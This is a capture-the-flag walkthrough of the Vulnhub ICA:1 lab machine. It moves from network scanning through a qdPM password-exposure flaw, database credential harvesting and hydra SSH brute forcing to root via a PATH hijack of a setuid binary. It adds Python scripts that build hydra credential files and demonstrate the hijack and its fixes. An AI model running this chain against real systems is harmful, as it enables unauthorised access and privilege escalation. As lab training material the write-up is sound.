
Vulnhub ICA target machine: detailed test walkthrough

Time: 2023-01-04 11:23:35
Tags: ICA, Vulnhub, kali, target machine, root

ICA

Author: jason_huawen

Target information

Name: ICA: 1

Address:

https://www.vulnhub.com/entry/ica-1,748/

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Desktop/Vulnhub/ICA]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts                                                              
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:ce:24:39      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.150  08:00:27:82:87:1a      1      60  PCS Systemtechnik GmbH                                                   


Kali Linux's built-in netdiscover tool identifies the target host's IP address as 192.168.56.150 (the other two hosts are the VirtualBox host-only adapter and its DHCP server).

Nmap scan

┌──(kali㉿kali)-[~/Desktop/Vulnhub/ICA]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.150 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-03 21:12 EST
Nmap scan report for bogon (192.168.56.150)
Host is up (0.00015s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 0e:77:d9:cb:f8:05:41:b9:e4:45:71:c1:01:ac:da:93 (RSA)
|   256 40:51:93:4b:f8:37:85:fd:a5:f4:d7:27:41:6c:a0:a5 (ECDSA)
|_  256 09:85:60:c5:35:c1:4d:83:76:93:fb:c7:f0:cd:7b:8e (ED25519)
80/tcp    open  http    Apache httpd 2.4.48 ((Debian))
|_http-title: qdPM | Login
|_http-server-header: Apache/2.4.48 (Debian)
3306/tcp  open  mysql   MySQL 8.0.26
| mysql-info: 
|   Protocol: 10
|   Version: 8.0.26
|   Thread ID: 39
|   Capabilities flags: 65535
|   Some Capabilities: Support41Auth, Speaks41ProtocolOld, ODBCClient, SupportsTransactions, FoundRows, SupportsLoadDataLocal, SwitchToSSLAfterHandshake, IgnoreSpaceBeforeParenthesis, LongPassword, InteractiveClient, Speaks41ProtocolNew, IgnoreSigpipes, SupportsCompression, LongColumnFlag, DontAllowDatabaseTableColumn, ConnectWithDatabase, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
|   Status: Autocommit
|   Salt:  (9MW*8DgK^({)5@\x1A\x0D0=
|_  Auth Plugin Name: caching_sha2_password
| ssl-cert: Subject: commonName=MySQL_Server_8.0.26_Auto_Generated_Server_Certificate
| Not valid before: 2021-09-25T10:47:29
|_Not valid after:  2031-09-23T10:47:29
|_ssl-date: TLS randomness does not represent time
33060/tcp open  mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
|     Invalid message"
|     HY000
|   LDAPBindReq: 
|     *Parse error unserializing protobuf message"
|     HY000
|   oracle-tns: 
|     Invalid message-frame."
|_    HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.92%I=7%D=1/3%Time=63B4E087%P=x86_64-pc-linux-gnu%r(NU
SF:LL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOpt
SF:ions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVersi
SF:onBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2B
SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fIn
SF:valid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%
SF:r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\
SF:x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCookie,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9,
SF:"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\x
SF:1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY00
SF:0")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,9
SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x08
SF:\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x
SF:05HY000")%r(LDAPBindReq,46,"\x05\0\0\0\x0b\x08\x05\x1a\x009\0\0\0\x01\x
SF:08\x01\x10\x88'\x1a\*Parse\x20error\x20unserializing\x20protobuf\x20mes
SF:sage\"\x05HY000")%r(SIPOptions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LAND
SF:esk-RC,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0
SF:\x0b\x08\x05\x1a\0")%r(NCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC
SF:,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0
SF:fInvalid\x20message\"\x05HY000")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1
SF:a\0")%r(WMSRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(oracle-tns,32,"\
SF:x05\0\0\0\x0b\x08\x05\x1a\0%\0\0\0\x01\x08\x01\x10\x88'\x1a\x16Invalid\
SF:x20message-frame\.\"\x05HY000")%r(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1
SF:a\0")%r(afp,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\
SF:x88'\x1a\x0fInvalid\x20message\"\x05HY000");
MAC Address: 08:00:27:82:87:1A (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.48 seconds

The nmap results show four open ports on the target: 22 (OpenSSH 8.4p1), 80 (Apache 2.4.48 serving a qdPM login page), 3306 (MySQL 8.0.26, exposed to the network) and 33060 (the MySQL X protocol).

Getting a shell

MySQL

First, check whether the database accepts a guessed or empty root password:

                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ICA]
└─$ mysql -u root -p -h 192.168.56.150                         
Enter password: 
ERROR 1045 (28000): Access denied for user 'root'@'192.168.56.146' (using password: YES)
                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ICA]
└─$ mysql -u root -p -h 192.168.56.150
Enter password: 
ERROR 1045 (28000): Access denied for user 'root'@'192.168.56.146' (using password: NO)
                                                                                            

HTTP

Browsing to port 80 returns a login page, which identifies the CMS as qdPM 9.2. Check for known vulnerabilities first:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/ICA]
└─$ searchsploit qdpm                                          
------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                             |  Path
------------------------------------------------------------------------------------------- ---------------------------------
qdPM 7 - Arbitrary File upload                                                             | php/webapps/19154.py
qdPM 7.0 - Arbitrary '.PHP' File Upload (Metasploit)                                       | php/webapps/21835.rb
qdPM 9.1 - 'cfg[app_app_name]' Persistent Cross-Site Scripting                             | php/webapps/48486.txt
qdPM 9.1 - 'filter_by' SQL Injection                                                       | php/webapps/45767.txt
qdPM 9.1 - 'search[keywords]' Cross-Site Scripting                                         | php/webapps/46399.txt
qdPM 9.1 - 'search_by_extrafields[]' SQL Injection                                         | php/webapps/46387.txt
qdPM 9.1 - 'type' Cross-Site Scripting                                                     | php/webapps/46398.txt
qdPM 9.1 - Arbitrary File Upload                                                           | php/webapps/48460.txt
qdPM 9.1 - Remote Code Execution                                                           | php/webapps/47954.py
qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)                                     | php/webapps/50175.py
qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) (v2)                                | php/webapps/50944.py
qdPM 9.2 - Cross-site Request Forgery (CSRF)                                               | php/webapps/50854.txt
qdPM 9.2 - Password Exposure (Unauthenticated)                                             | php/webapps/50176.txt
qdPM < 9.1 - Remote Code Execution                                                         | multiple/webapps/48146.py
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ICA]
└─$ searchsploit -m php/webapps/50176.txt    
  Exploit: qdPM 9.2 - Password Exposure (Unauthenticated)
      URL: https://www.exploit-db.com/exploits/50176
     Path: /usr/share/exploitdb/exploits/php/webapps/50176.txt
File Type: ASCII text

Copied to: /home/kali/Desktop/Vulnhub/ICA/50176.txt


Although the exploit write-up gives a username and password, the login form here wants an e-mail address in the username field, so that login fails. Following the write-up's steps does, however, retrieve the databases.yml file:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/ICA]
└─$ cat databases.yml 
  
all:
  doctrine:
    class: sfDoctrineDatabase
    param:
      dsn: 'mysql:dbname=qdpm;host=localhost'
      profiler: false
      username: qdpmadmin
      password: "<?php echo urlencode('UcVQCMQk2STVeS6J') ; ?>"
      attributes:
        quote_identifier: true  
                                  

These should be the database username and password (PHP's urlencode() leaves an alphanumeric string unchanged, so the password is UcVQCMQk2STVeS6J). Since MySQL is exposed on port 3306, connect to it with these credentials; the staff database is the interesting one:

MySQL [staff]> show tables;
+-----------------+
| Tables_in_staff |
+-----------------+
| department      |
| login           |
| user            |
+-----------------+
3 rows in set (0.002 sec)

MySQL [staff]> select * from login;
+------+---------+--------------------------+
| id   | user_id | password                 |
+------+---------+--------------------------+
|    1 |       2 | c3VSSkFkR3dMcDhkeTNyRg== |
|    2 |       4 | N1p3VjRxdGc0MmNtVVhHWA== |
|    3 |       1 | WDdNUWtQM1cyOWZld0hkQw== |
|    4 |       3 | REpjZVZ5OThXMjhZN3dMZw== |
|    5 |       5 | Y3FObkJXQ0J5UzJEdUpTeQ== |
+------+---------+--------------------------+
5 rows in set (0.001 sec)

MySQL [staff]> select * from user;
+------+---------------+--------+---------------------------+
| id   | department_id | name   | role                      |
+------+---------------+--------+---------------------------+
|    1 |             1 | Smith  | Cyber Security Specialist |
|    2 |             2 | Lucas  | Computer Engineer         |
|    3 |             1 | Travis | Intelligence Specialist   |
|    4 |             1 | Dexter | Cyber Security Analyst    |
|    5 |             2 | Meyer  | Genetic Engineer          |
+------+---------------+--------+---------------------------+
5 rows in set (0.001 sec)

MySQL [staff]> 


┌──(kali㉿kali)-[~/Desktop/Vulnhub/ICA]
└─$ echo 'c3VSSkFkR3dMcDhkeTNyRg==' | base64 -d
suRJAdGwLp8dy3rF                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ICA]
└─$ echo 'N1p3VjRxdGc0MmNtVVhHWA==' | base64 -d
7ZwV4qtg42cmUXGX                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ICA]
└─$ echo 'WDdNUWtQM1cyOWZld0hkQw==' | base64 -d
X7MQkP3W29fewHdC                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ICA]
└─$ echo 'REpjZVZ5OThXMjhZN3dMZw==' | base64 -d
DJceVy98W28Y7wLg                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ICA]
└─$ echo 'Y3FObkJXQ0J5UzJEdUpTeQ==' | base64 -d
cqNnBWCByS2DuJSy               

Decode the base64-encoded passwords from the database (they are encoded, not hashed, so the decoded strings are the cleartext), then export the usernames as a user dictionary and the decoded passwords as a password dictionary:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/ICA]
└─$ hydra -L user.dict -P pass.dict ssh://192.168.56.150                                        
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-03 21:54:15
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task
[DATA] attacking ssh://192.168.56.150:22/
[22][ssh] host: 192.168.56.150   login: travis   password: DJceVy98W28Y7wLg
[22][ssh] host: 192.168.56.150   login: dexter   password: 7ZwV4qtg42cmUXGX
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-03 21:54:23
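The following Python script is an added example, not code from the original post: it reproduces the credential-harvesting step offline. It extracts the database credential from a copy of the databases.yml above (the value inside the PHP urlencode() tag), then joins the staff.login rows to staff.user via user_id so that each decoded password is paired with its own account. The sample rows are copied from the query output above; the file names user.dict, pass.dict and creds.txt are my choice. With the join done, the two hits hydra found above (travis and dexter) fall out directly, and hydra's -C option can try just the five login:password pairs instead of spraying all 25 combinations.

```python
import base64
import re
import urllib.parse

# Constructed copy of the databases.yml fetched above (added example, not the
# post's code). Symfony 1.x evaluates the PHP inside the YAML, so the password
# MySQL actually sees is urlencode('UcVQCMQk2STVeS6J'), not the literal tag.
DATABASES_YML = """\
all:
  doctrine:
    class: sfDoctrineDatabase
    param:
      dsn: 'mysql:dbname=qdpm;host=localhost'
      profiler: false
      username: qdpmadmin
      password: "<?php echo urlencode('UcVQCMQk2STVeS6J') ; ?>"
"""

# Constructed rows mirroring staff.user and staff.login from the query output above.
USERS = {1: "Smith", 2: "Lucas", 3: "Travis", 4: "Dexter", 5: "Meyer"}  # id -> name
LOGINS = [                                                               # (id, user_id, password)
    (1, 2, "c3VSSkFkR3dMcDhkeTNyRg=="),
    (2, 4, "N1p3VjRxdGc0MmNtVVhHWA=="),
    (3, 1, "WDdNUWtQM1cyOWZld0hkQw=="),
    (4, 3, "REpjZVZ5OThXMjhZN3dMZw=="),
    (5, 5, "Y3FObkJXQ0J5UzJEdUpTeQ=="),
]


def db_credentials(yml_text):
    """Return (username, password) from a Symfony 1.x databases.yml.

    If the password is wrapped in <?php echo urlencode('...') ?>, apply the same
    encoding PHP would (quote_plus with no safe chars is the closest stdlib match);
    for an alphanumeric secret the result is the string itself."""
    user = re.search(r"^\s*username:\s*(\S+)\s*$", yml_text, re.M).group(1)
    pw_line = re.search(r"^\s*password:\s*(.+?)\s*$", yml_text, re.M).group(1)
    pw_line = pw_line.strip("\"'")
    php = re.search(r"urlencode\('([^']*)'\)", pw_line)
    password = urllib.parse.quote_plus(php.group(1), safe="") if php else pw_line
    return user, password


def decode_password(blob):
    """staff.login stores base64, not a hash, so this returns the cleartext.
    validate=True makes a non-base64 value (e.g. a real bcrypt hash) raise."""
    return base64.b64decode(blob, validate=True).decode("ascii")


def credential_pairs(users=USERS, logins=LOGINS):
    """Join login.user_id -> user.id so each decoded password is tied to its account.
    Usernames are lowercased because that is how the Linux accounts are named."""
    return [(users[user_id].lower(), decode_password(blob)) for _, user_id, blob in logins]


def hydra_inputs(pairs):
    """Return the contents of user.dict, pass.dict and creds.txt.

    -L user.dict -P pass.dict sprays every combination (5 x 5 = 25 tries);
    -C creds.txt tries only the joined login:password pairs (5 tries), which is
    quieter and less likely to trip SSH rate limits on a real target."""
    users = "".join(f"{u}\n" for u, _ in pairs)
    passwords = "".join(f"{p}\n" for _, p in pairs)
    colon = "".join(f"{u}:{p}\n" for u, p in pairs)
    return users, passwords, colon


if __name__ == "__main__":
    print("qdPM DB credentials:", db_credentials(DATABASES_YML))
    pairs = credential_pairs()
    for name, body in zip(("user.dict", "pass.dict", "creds.txt"), hydra_inputs(pairs)):
        with open(name, "w") as fh:
            fh.write(body)
    print("next: hydra -t 4 -C creds.txt ssh://192.168.56.150")
```

Running the script writes the three files into the current directory; creds.txt is the one to feed to hydra -C. The join also explains why only travis and dexter logged in: each database row holds exactly one password for one account, and only those two accounts reuse their staff password for SSH.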

┌──(kali㉿kali)-[~/Desktop/Vulnhub/ICA]
└─$ ssh [email protected]
The authenticity of host '192.168.56.150 (192.168.56.150)' can't be established.
ED25519 key fingerprint is SHA256:xCJPzSxRekyYT6eXmyzAXdY7uAlP5b7vQp+B5XqYsfE.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.150' (ED25519) to the list of known hosts.
[email protected]'s password: 
Linux debian 5.10.0-8-amd64 #1 SMP Debian 5.10.46-5 (2021-09-23) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Sep 25 14:55:01 2021 from 192.168.1.7
travis@debian:~$ 

┌──(kali㉿kali)-[~/Desktop/Vulnhub/ICA]
└─$ ssh [email protected]
[email protected]'s password: 
Linux debian 5.10.0-8-amd64 #1 SMP Debian 5.10.46-5 (2021-09-23) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Sep 25 08:43:19 2021 from 192.168.1.3
dexter@debian:~$ 


Privilege escalation

dexter@debian:~$ find / -type f -perm -u=s 2>/dev/null
/opt/get_access
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
dexter@debian:~$ ls -alh /opt/get_access 
-rwsr-xr-x 1 root root 17K Sep 25  2021 /opt/get_access
dexter@debian:~$ strings /opt/get_access 
/lib64/ld-linux-x86-64.so.2
setuid
socket
puts
system
__cxa_finalize
setgid
__libc_start_main
libc.so.6
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
cat /root/system.info

The strings output shows that get_access imports setuid, setgid and system and contains the command string cat /root/system.info, so it almost certainly runs that command through system() with the environment we give it. Because cat is referenced by a bare name rather than /bin/cat, the shell resolves it through PATH, and we can put our own cat first in PATH:

dexter@debian:~$ cd /tmp
dexter@debian:/tmp$ echo '/bin/bash' > cat
dexter@debian:/tmp$ chmod 777 cat
dexter@debian:/tmp$ export PATH=/tmp:$PATH
dexter@debian:/tmp$ echo $PATH
/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
dexter@debian:/tmp$ /opt/get_access 
root@debian:/tmp# cd /root
root@debian:/root# ls -alh
total 40K
drwx------  3 root root 4.0K Sep 25  2021 .
drwxr-xr-x 18 root root 4.0K Sep 25  2021 ..
-rw-------  1 root root   20 Sep 25  2021 .bash_history
-rw-r--r--  1 root root  571 Apr 10  2021 .bashrc
drwxr-xr-x  3 root root 4.0K Sep 25  2021 .local
-rw-------  1 root root  647 Sep 25  2021 .mysql_history
-rw-r--r--  1 root root  161 Jul  9  2019 .profile
-rw-r--r--  1 root root   45 Sep 25  2021 root.txt
-rw-r--r--  1 root root  260 Sep 25  2021 system.info
-rw-r--r--  1 root root  217 Sep 25  2021 .wget-hsts
root@debian:/root# cat root.txt
root@debian:/root# more root.txt
ICA{Next_Generation_Self_Renewable_Genetics}
root@debian:/root# 

Lessons learned

  1. After getting into a database and obtaining usernames and password data, you often cannot log straight into the admin backend with them, but the data still serves as username and password dictionaries for cracking other services with hydra.

  2. For a custom executable, inspect it with strings; if it invokes a command by a relative name rather than an absolute path, as cat was invoked here, you can create your own file of that name and adjust the PATH environment variable to escalate privileges. Remember that the hijacked PATH persists in the resulting root shell: that is why cat root.txt above printed nothing (it ran /tmp/cat, which started another bash) and more was needed; use /bin/cat or restore PATH.
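As an added example (mine, not from the post and not the code of the get_access binary), the Python script below demonstrates the PATH hijack used against get_access above and the two fixes a setuid program should apply. It runs a command through /bin/sh -c the way system(3) does; a fake cat in a temporary directory stands in for /tmp/cat, a constructed file stands in for /root/system.info, and nothing here needs root.

```python
import os
import subprocess
import tempfile


def run_via_shell(command, env):
    """Run `command` through /bin/sh -c, as system(3) does, under the given env."""
    done = subprocess.run(["/bin/sh", "-c", command], env=env,
                          capture_output=True, text=True)
    return done.stdout.strip()


def path_hijack_demo():
    """Return what `cat <file>` prints under three environments:
      1. bare command name, attacker directory first in PATH  -> impostor runs
      2. absolute /bin/cat, same attacker PATH                -> real cat
      3. bare command name, PATH reset to trusted directories -> real cat
    """
    with tempfile.TemporaryDirectory() as evil:
        fake_cat = os.path.join(evil, "cat")          # stands in for /tmp/cat
        with open(fake_cat, "w") as fh:
            fh.write("#!/bin/sh\necho HIJACKED\n")   # the post used '/bin/bash' here
        os.chmod(fake_cat, 0o755)

        target = os.path.join(evil, "system.info")   # constructed stand-in for /root/system.info
        with open(target, "w") as fh:
            fh.write("real contents\n")

        attacker_env = {"PATH": evil + os.pathsep + "/usr/bin:/bin"}
        trusted_env = {"PATH": "/usr/bin:/bin"}

        vulnerable = run_via_shell(f"cat {target}", attacker_env)   # what get_access does
        fixed_abs = run_via_shell(f"/bin/cat {target}", attacker_env)
        fixed_env = run_via_shell(f"cat {target}", trusted_env)
    return vulnerable, fixed_abs, fixed_env


if __name__ == "__main__":
    for label, out in zip(("relative + hijacked PATH", "absolute path", "clean PATH"),
                          path_hijack_demo()):
        print(f"{label:26s}: {out}")
```

Under the first environment the shell resolves the bare word cat through PATH and runs the impostor, which is exactly what happened with /opt/get_access; the absolute path and the reset PATH both defeat it. In the real binary the proper fix is to stop using system() altogether and either open and read the file directly or execve() a fixed absolute path with a controlled environment, since a setuid program inherits whatever environment the caller chooses.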

Source: https://www.cnblogs.com/jason-huawen/p/17024334.html
